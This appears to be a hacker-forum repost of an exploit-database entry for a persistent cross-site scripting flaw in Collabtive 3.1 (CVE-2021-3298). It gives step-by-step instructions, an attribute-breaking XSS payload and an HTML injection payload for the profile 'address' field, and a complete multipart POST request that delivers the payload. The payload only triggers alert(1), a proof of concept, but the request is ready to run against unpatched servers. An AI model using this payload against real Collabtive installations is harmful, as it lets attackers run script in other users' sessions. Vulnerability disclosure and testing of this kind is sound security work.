跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Collabtive 3.1 - 'address' Persistent Cross-Site Scripting

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
# CVE: CVE-2021-3298

==> Tutorial <==

1- Login to your account.
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
- You will see the executed HTML payload at there. (HTML Injection)
- You will see the executed XSS payload at profile edit section. (XSS)

==> Executed Payloads <==

XSS Payload   ==>   " onfocus="alert(1)" autofocus="
HTML Payload ==>   <h1>DehaBerkinBir</h1>

==> HTTP Request <==

POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1

-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"

" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297

Content-Disposition: form-data; name="zip"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"


-----------------------------12097618915709137911841560297--

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。